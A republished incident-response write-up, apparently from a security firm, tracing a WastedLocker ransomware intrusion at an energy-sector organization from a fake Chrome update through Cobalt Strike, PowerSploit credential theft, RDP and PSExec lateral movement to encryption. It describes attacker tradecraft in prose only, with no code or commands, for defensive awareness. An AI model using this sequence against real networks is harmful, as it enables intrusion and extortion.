Alta Pro is committed to keeping you cyber-safe. That’s why we’re so pleased to partner with Tetra Defense – an industry-leading cybersecurity company – on breaking news and key developments on this topic. The following post is an autopsy of a cyber-attack, in which Tetra was called in to neutralize a ransomware attack. It is republished with permission.
WastedLocker attacks have targeted individual organizations within the U.S. and at least 13 other countries, maliciously encrypting them using a number of unique strategies and tools. In this particular case, these tools included social engineering, PowerSploit, Cobalt Strike, Remote Desktop Protocol (RDP), and even a fake Google Chrome update.
After a successful WastedLocker ransomware attack, all accessible user files on a victim’s network are encrypted, leaving the remaining filename extensions to contain the word “wasted” – hence the ransomware name.
The end of the year is a stressful time for everyone, but it’s especially stressful for lawyers and legal professionals. Closing out case matters, completing Q4 financials, shopping for presents, making holiday plans. There never seem to be enough hours in the day to get everything done. The key to easing your stress could be Micro Self-Care. What’s Micro Self-Care? Attend our annual wellness webinar “What is Micro Self-Care and Why Do You Need It?” on December 14 and find out. The presenter, Michael Kahn, is a JD and licensed therapist who concentrates in treating lawyers struggling with stress, depression, substance use disorders, and other career issues. This free, one-hour webinar is the latest in Alta Pro’s ongoing series of cutting-edge legal education programs. Sign up here.
Method of Compromise: Drive-by Download of SocGholish
An organization within the energy industry fell victim to WastedLocker ransomware in a very innocent way: while conducting COVID-19 related research. Unfortunately, during this research, a user on the network browsed an article on a newspaper website that was infected with the SocGholish exploit toolkit.
SocGholish is a Remote Access Trojan (RAT) designed to mimic the look and feel of typical website advertisements. It often prompts a user to download an update of trusted software, that when clicked, downloads a trojan that sets WastedLocker ransomware in motion. The newspaper website in this case automatically downloaded a fake Google Chrome update, complete with a prompt for the user to “launch.” The cooperative and unsuspecting user ran the toolkit and downloaded a trojan, all the while believing they were updating their browser. This activity gave the threat actor remote access to the endpoint.
Symantec reported their confirmation that dozens of U.S. newspaper websites owned by the same parent company were compromised in June, but this method of attack is not unique to newspaper websites. Social engineering of this caliber can mimic other trusted websites in hopes of deceiving unsuspecting users. Symantec also reported “at least 150 other legitimate websites that refer traffic to [other] websites hosting the SocGholish zip file,” which puts its prevalence across the internet into perspective.
- COVID19 related browser activity
The malicious website required user interaction.
- Fake Update with SocGholish Exploit
When clicked, the trojan was downloaded.
- PowerShell Cobalt Strike Loader
This allowed the TA to have remote access.
- Cobalt Strike Beacon
Gives visibility of the network to the TA.
- System Utilities
Allows for faster deployment of ransomware after recon.
- WastedLocker Execution
Malicious encryption, ending with altered filenames.
Evidence of Lateral Movement
Within a few days of gaining access to the victim’s network, forensic examination revealed that the WastedLocker threat actor performed recon on the network and stole user credentials. Tetra’s investigation revealed that the attacker also modified a script via yet another tool: PowerSploit.
PowerSploit is an open-source, offensive security framework comprised of PowerShell modules and scripts designed to perform a wide range of penetration testing tasks (code execution, persistence, bypassing antivirus, recon, and exfiltration).
The PowerSploit modules allow attackers several different capabilities, including maintaining access to a victim’s network, bypassing antivirus products and security software, accessing passwords saved in memory, and executing code. In this case, PowerSploit was used to capture network traffic and steal credentials.
Other Threat Actor Tools
Additionally, Tetra identified evidence of resource exhaustion events for other hosts, meaning that the first compromised endpoint (the COVID19 research device) acted as a Machine in the Middle (MITM) to intercept traffic. The threat actor intercepted administrator credentials using this MITM technique and subsequently used those credentials to move laterally to other hosts within the victim’s network.
In the next phase of the attack, Tetra found that Cobalt Strike was used (and then later removed) for further access to the network. Cobalt Strike is an Offensive Security Tool used by both threat actors and legitimate penetration testers to access a network through “command-and-control” over encrypted ports. This tool grants access to these networks covertly, and threat actors also use these stealthy methods to exfiltrate data in a manner that victims may not detect. Tetra found similar evidence of Cobalt Strike execution on several additional hosts on the victim’s network.
The threat actor also used Remote Desktop Protocol (RDP) to move laterally to additional hosts on the victim network. RDP is not only used when logging into a network from a computer outside the local network, but also to access servers or workstations within a local one. Thus, “remote” does not always imply that the connection originated from an outside source. Tetra identified that lateral movement occurred using numerous RDP logins from several compromised machines on the victim’s network, all while using scraped credentials from various user accounts.
Finally, the threat actor began deploying WastedLocker ransomware to various hosts using RDP and PSExec. PSExec is yet another legitimate system administration tool that can remotely access endpoints as a privileged user. Threat actors commonly use PSExec during their campaigns to move laterally and deploy software.
The WastedLocker ransomware executable name was personalized to reflect the victim’s name on most machines, complete with its intimidating namesake, “wasted.” However, as the malware ran, WastedLocker ransomware also created copies of itself using seemingly innocuous names like Trace.exe, Diag.exe, and Keyboard.exe. WastedLocker established persistence to run after reboot and delete these executables after completion of the encryption process.